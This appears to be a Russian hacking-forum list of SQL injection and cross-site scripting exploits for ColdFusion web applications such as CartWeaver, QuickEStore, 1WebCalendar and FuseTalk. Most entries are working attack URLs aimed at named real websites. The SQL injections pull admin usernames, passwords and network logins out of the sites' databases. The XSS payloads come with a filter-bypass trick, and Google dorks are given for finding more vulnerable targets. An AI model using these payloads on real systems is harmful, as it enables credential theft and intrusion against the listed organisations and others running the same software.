CartWeaver (Details.cfm ProdID) Remote SQL Injection Vulnerability
admin_username:
http://www.site.com/Details.cfm?ProdID=1%20and%201=convert(int,(select %20top%201%20admin_username%20from%20tbl_adminuser s))
admin_password:
http://www.site.com/Details.cfm?ProdID=1%20and%201=convert(int,(select %20top%201%20char(97)%2badmin_password%20from%20tb l_adminusers))
admin:
http://www.site.com/[script path]/cw2/admin/
dork:
allinurl: Details.cfm?ProdID=
allinurl: Results.cfm?category=
QuickEStore <= 8.2 (insertorder.cfm) Remote SQL Injection Vulnerability
admin password:
http://www.site.com/insertorder.cfm?CFID=123&CFTOKEN=1 union select 1,2,3,password,5,6,7,8,9,10,11,12 from params"having 1=1
link admin:
http://www.site.com/admin/
XSS в Savvy Content Manager
Уязвимость существует из-за недостаточной обработки входных данных в параметре "searchterms" в сценариях searchresults.cfm, search_results.cfm и search_results/index.cfm.
Example:
http://www.ulsf.org/cgi-bin/searchresults.cfm?search=Search&searchterm="><scri pt>alert('Antichat')</script>
XSS в Tradingeye Shop
Уязвимость существует из-за недостаточной обработки входных данных в параметре "image" в сценарии details.cfm.
Example:
http://www.azumahallpro.com/site/details.cfm?image="><script>alert('Antichat')</script>
XSS в iPostMX 2005
Уязвимость существует из-за недостаточной обработки входных данных в параметре "RETURNURL" в сценариях userlogin.cfm и account.cfm.
Example:
http://www.scenta.co.uk/home/userlogin.cfm?returnUrl="><script>alert('Antichat' )</script>
XSS в Goss iCM
Уязвимость существует из-за недостаточной обработки входных данных в параметре "keyword" в сценарии index.cfm.
Example:
http://www.simtropolis.com/stex/index.cfm?Keyword="><script>alert('Antichat')</script>
SQL-Inj в 1WebCalendar
Уязвимость существует из-за недостаточной обработки входных данных в параметре "EventID" в сценарии "viewEvent.cfm", в параметре "NewsID" в сценарии "news/newsView.cfm" и параметре "ThisDate" в сценарии "mainCal.cfm".
Example:
http://events.lapl.org/viewEvent.cfm?eventID=-1+union+select+1,2,3,4,5,6,unhex(hex(concat_ws(0x3 a,lapl_email,lapl_email_password,network_loginID,n etwork_password,win_loginID,win_password,LoginID,M ainPassword))),8,9,10,11,12,131,4,15,16,17,18,9,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7+from+user_access+limit+0,1/*
XSS в CommonSpot
Уязвимость существует из-за недостаточной обработки входных данных в параметре "bNewWindow" в сценарии "loader.cfm".
Example:
http://author.heritage.org/About/Departments/loader.cfm?url=/commonspot/security/login.cfm&bNewWindow="><script>alert('Antichat')</script>
XSS в e-publish
Уязвимость существует из-за недостаточной обработки входных данных в параметрах "obcatid" и "comid" в сценарии "show.cfm".
Example:
http://www.paratiritisnews.gr/show_archive.cfm?id=200&obcatid=4"><IMG SRC="javascript:alert('Antichat');">
Примечание: не раз уже сталкивался с тем, что когда мы подставляем <script>alert()</script>, то в сорсе открывающий тег заменяется на <InvalidTag>. Обходится очень просто, пример выше.
XSS в Honeycomb Archive
Межсайтовый скриптинг возможен из-за недостаточной обработки входных данных в параметре "keyword" в сценарии "search.cfm".
Example:
http://www.scu.edu/siteindex/search.cfm?keyword="><IMG SRC="javascript:alert('Antichat');">
XSS в Hot Banana Web Content Management Suite
Уязвимость существует из-за недостаточной обработки входных данных в параметре "keywords" сценария "index.cfm".
Example:
http://www.robertmorris.edu/search/index.cfm?keywords="><IMG SRC="javascript:alert('Antichat');">
XSS в CF_Nuke
Межсайтовый скриптинг возможен из-за недостаточной обработки входных данных в параметрах "cat", "topic" и "newsid".
Example:
http://www.nora.org/index.cfm?sector=news&page=read&newsid="><IMG SRC="javascript:alert('Antichat');">
SQL-Inj в Magic Forum Personal
Уязвимость существует при обработке входных данных в параметрах "ForumID", "Thread" и "ThreadID" в сценарии "view_forum.cfm".
Example:
http://www.fecca.org.au/forum/view_forum.cfm?ForumID=1+or+1=(SELECT+TOP+1+cast(L ogin+as+nvarchar)%2Bchar(58)%2Bcast(Password+as+nv archar)+from+ForumUsers)--
XSS в Simple Message Board
Уязвимость существует из-за недостаточной обработки входных данных в сценариях 'forum.cfm', 'user.cfm', thread.cfm' и 'search.cfm'.
Example:
http://www.hungrymonster.com/messageboard/thread.cfm?TID="><IMG SRC="javascript:alert('Antichat');">
XSS в Quick Cart
Уязвимость существует из-за некорректной обработки входных данных в параметре 'search' сценария 'search.cfm'.
Example:
http://www.guardianhomeexchange.com/ihea/search.cfm?search="><IMG SRC="javascript:alert('Antichat');">
XSS в FuseTalk
Уязвимость существует из-за некорректной обработки входных данных в параметре 'ProfileID' модуля 'tombstone.cfm'.
Example:
http://www.wilmott.com/tombstone.cfm?ProfileID="><IMG SRC="javascript:alert('Antichat');">